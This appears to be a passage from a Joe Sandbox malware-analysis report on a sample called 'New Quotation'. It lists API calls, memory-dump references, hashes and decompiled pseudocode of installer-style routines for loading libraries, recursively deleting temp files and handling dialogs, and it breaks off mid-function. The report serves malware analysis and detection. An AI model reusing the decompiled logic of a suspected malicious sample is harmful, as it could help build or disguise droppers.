                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109226d
                                                                                                                                                                                          0x71092272
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092272
                                                                                                                                                                                          0x71091ea5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091eab
                                                                                                                                                                                          0x71091eab
                                                                                                                                                                                          0x71091eb4
                                                                                                                                                                                          0x71091eb9
                                                                                                                                                                                          0x71091ebf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091ec5
                                                                                                                                                                                          0x71091ed2
                                                                                                                                                                                          0x71091ed8
                                                                                                                                                                                          0x71091ee2
                                                                                                                                                                                          0x71091ee8
                                                                                                                                                                                          0x71091ef0
                                                                                                                                                                                          0x71091f00
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091f00

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 710912BB: GlobalAlloc.KERNEL32(00000040,?,710912DB,?,7109137F,00000019,710911CA,-000000A0), ref: 710912C5
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 71091D2D
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 71091D75
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 71091D7F
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71091D92
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71091E74
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71091E79
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71091E7E
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71092068
                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 71092222
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 710922A1
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000008), ref: 710922B2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 7109230C
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000808), ref: 71092326
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 245916457-0
                                                                                                                                                                                          • Opcode ID: 32b29b88f5f4a5ee107fa48d4140b23bc3c46a1e0f0c907db32125cd7bdac232
                                                                                                                                                                                          • Instruction ID: e52a0af145160a01855f8624c8054af8d85d43e6f274d86204d283ad1d2d2da3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32b29b88f5f4a5ee107fa48d4140b23bc3c46a1e0f0c907db32125cd7bdac232
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA22E271E0420ADEDB12DFB4C5A06EDBBF2FB04B25F1185AEE167E2280D3705585EB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 663 405c49-405c6f call 405f14 666 405c71-405c83 DeleteFileW 663->666 667 405c88-405c8f 663->667 668 405e05-405e09 666->668 669 405c91-405c93 667->669 670 405ca2-405cb2 call 40653d 667->670 671 405db3-405db8 669->671 672 405c99-405c9c 669->672 676 405cc1-405cc2 call 405e58 670->676 677 405cb4-405cbf lstrcatW 670->677 671->668 675 405dba-405dbd 671->675 672->670 672->671 678 405dc7-405dcf call 406873 675->678 679 405dbf-405dc5 675->679 680 405cc7-405ccb 676->680 677->680 678->668 687 405dd1-405de5 call 405e0c call 405c01 678->687 679->668 683 405cd7-405cdd lstrcatW 680->683 684 405ccd-405cd5 680->684 686 405ce2-405cfe lstrlenW FindFirstFileW 683->686 684->683 684->686 688 405d04-405d0c 686->688 689 405da8-405dac 686->689 703 405de7-405dea 687->703 704 405dfd-405e00 call 40559f 687->704 693 405d2c-405d40 call 40653d 688->693 694 405d0e-405d16 688->694 689->671 692 405dae 689->692 692->671 705 405d42-405d4a 693->705 706 405d57-405d62 call 405c01 693->706 697 405d18-405d20 694->697 698 405d8b-405d9b FindNextFileW 694->698 697->693 699 405d22-405d2a 697->699 698->688 702 405da1-405da2 FindClose 698->702 699->693 699->698 702->689 703->679 707 405dec-405dfb call 40559f call 4062fd 703->707 704->668 705->698 708 405d4c-405d55 call 405c49 705->708 716 405d83-405d86 call 40559f 706->716 717 405d64-405d67 706->717 707->668 708->698 716->698 720 405d69-405d79 call 40559f call 4062fd 717->720 721 405d7b-405d81 717->721 720->698 721->698
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                                                                                                                          0x00405c53
                                                                                                                                                                                          0x00405c58
                                                                                                                                                                                          0x00405c61
                                                                                                                                                                                          0x00405c64
                                                                                                                                                                                          0x00405c6c
                                                                                                                                                                                          0x00405c6f
                                                                                                                                                                                          0x00405c72
                                                                                                                                                                                          0x00405c7a
                                                                                                                                                                                          0x00405c7c
                                                                                                                                                                                          0x00405c7d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405c7d
                                                                                                                                                                                          0x00405c88
                                                                                                                                                                                          0x00405c8b
                                                                                                                                                                                          0x00405c8b
                                                                                                                                                                                          0x00405c8b
                                                                                                                                                                                          0x00405c8f
                                                                                                                                                                                          0x00405ca2
                                                                                                                                                                                          0x00405ca9
                                                                                                                                                                                          0x00405cae
                                                                                                                                                                                          0x00405cb2
                                                                                                                                                                                          0x00405cc2
                                                                                                                                                                                          0x00405cb4
                                                                                                                                                                                          0x00405cba
                                                                                                                                                                                          0x00405cba
                                                                                                                                                                                          0x00405cc7
                                                                                                                                                                                          0x00405ccb
                                                                                                                                                                                          0x00405cd7
                                                                                                                                                                                          0x00405cdd
                                                                                                                                                                                          0x00405ce2
                                                                                                                                                                                          0x00405ce8
                                                                                                                                                                                          0x00405cf3
                                                                                                                                                                                          0x00405cf9
                                                                                                                                                                                          0x00405cfb
                                                                                                                                                                                          0x00405cfe
                                                                                                                                                                                          0x00405da8
                                                                                                                                                                                          0x00405da8
                                                                                                                                                                                          0x00405dac
                                                                                                                                                                                          0x00405dae
                                                                                                                                                                                          0x00405dae
                                                                                                                                                                                          0x00405dae
                                                                                                                                                                                          0x00405dae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d04
                                                                                                                                                                                          0x00405d04
                                                                                                                                                                                          0x00405d04
                                                                                                                                                                                          0x00405d0c
                                                                                                                                                                                          0x00405d2c
                                                                                                                                                                                          0x00405d34
                                                                                                                                                                                          0x00405d39
                                                                                                                                                                                          0x00405d40
                                                                                                                                                                                          0x00405d5b
                                                                                                                                                                                          0x00405d60
                                                                                                                                                                                          0x00405d62
                                                                                                                                                                                          0x00405d86
                                                                                                                                                                                          0x00405d64
                                                                                                                                                                                          0x00405d64
                                                                                                                                                                                          0x00405d67
                                                                                                                                                                                          0x00405d7b
                                                                                                                                                                                          0x00405d69
                                                                                                                                                                                          0x00405d6c
                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                          0x00405d67
                                                                                                                                                                                          0x00405d42
                                                                                                                                                                                          0x00405d48
                                                                                                                                                                                          0x00405d4a
                                                                                                                                                                                          0x00405d50
                                                                                                                                                                                          0x00405d50
                                                                                                                                                                                          0x00405d4a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d40
                                                                                                                                                                                          0x00405d0e
                                                                                                                                                                                          0x00405d16
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d18
                                                                                                                                                                                          0x00405d20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d22
                                                                                                                                                                                          0x00405d2a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d8b
                                                                                                                                                                                          0x00405d93
                                                                                                                                                                                          0x00405d99
                                                                                                                                                                                          0x00405d99
                                                                                                                                                                                          0x00405da2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405da2
                                                                                                                                                                                          0x00405ccd
                                                                                                                                                                                          0x00405cd5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405c91
                                                                                                                                                                                          0x00405c91
                                                                                                                                                                                          0x00405c93
                                                                                                                                                                                          0x00405db3
                                                                                                                                                                                          0x00405db5
                                                                                                                                                                                          0x00405db8
                                                                                                                                                                                          0x00405e09
                                                                                                                                                                                          0x00405e09
                                                                                                                                                                                          0x00405e09
                                                                                                                                                                                          0x00405dba
                                                                                                                                                                                          0x00405dbd
                                                                                                                                                                                          0x00405dc8
                                                                                                                                                                                          0x00405dcd
                                                                                                                                                                                          0x00405dcf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405dd2
                                                                                                                                                                                          0x00405dde
                                                                                                                                                                                          0x00405de3
                                                                                                                                                                                          0x00405de5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e00
                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                          0x00405dea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405def
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405df6
                                                                                                                                                                                          0x00405dbf
                                                                                                                                                                                          0x00405dbf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405dbf
                                                                                                                                                                                          0x00405c99
                                                                                                                                                                                          0x00405c9c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405c9c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,75363420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                                          • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75363420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,75363420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                          • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                          • API String ID: 2035342205-1953461807
                                                                                                                                                                                          • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                          • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}




                                                                                                                                                                                          0x0040687e
                                                                                                                                                                                          0x00406887
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406894
                                                                                                                                                                                          0x0040688a
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 46u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75363420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                          • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                          • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 202 403fc9-403fd6 SetWindowPos 197->202 203 403fdc-403fe3 197->203 200 4041c6-4041cb call 4044e5 198->200 201 404188-40418b 198->201 199->198 213 4041d0-4041eb 200->213 205 40418d-404198 call 401389 201->205 206 4041be-4041c0 201->206 202->203 208 403fe5-403fff ShowWindow 203->208 209 404027-40402d 203->209 205->206 230 40419a-4041b9 SendMessageW 205->230 206->200 212 404466 206->212 214 404100-40410e call 404500 208->214 215 404005-404018 GetWindowLongW 208->215 216 404046-404049 209->216 217 40402f-404041 DestroyWindow 209->217 219 404468-40446f 212->219 226 4041f4-4041fa 213->226 227 4041ed-4041ef call 40140b 213->227 214->219 215->214 228 40401e-404021 ShowWindow 215->228 222 40404b-404057 SetWindowLongW 216->222 223 40405c-404062 216->223 220 404443-404449 217->220 220->212 233 40444b-404451 220->233 222->219 223->214 229 404068-404077 GetDlgItem 223->229 234 404200-40420b 226->234 235 404424-40443d DestroyWindow EndDialog 226->235 227->226 228->209 236 404096-404099 229->236 237 404079-404090 SendMessageW IsWindowEnabled 229->237 230->219 233->212 238 404453-40445c ShowWindow 233->238 234->235 239 404211-40425e call 40657a call 404499 * 3 GetDlgItem 234->239 235->220 241 40409b-40409c 236->241 242 40409e-4040a1 236->242 237->212 237->236 238->212 266 404260-404265 239->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 239->267 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->214 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->214 250->244 254 4040d3-4040dc call 40140b 251->254 255 4040be-4040c4 call 40140b 251->255 254->214 263 4040de-4040e8 254->263 264 4040ca 255->264 263->264 264->244 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->213 286 404339-40433b 275->286 286->213 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->220 290 40437e-4043ab CreateDialogParamW 288->290 289->212 291 404353-404359 289->291 290->220 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 290->293 291->213 292 40435f 291->292 292->212 293->212 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->220
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t146;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
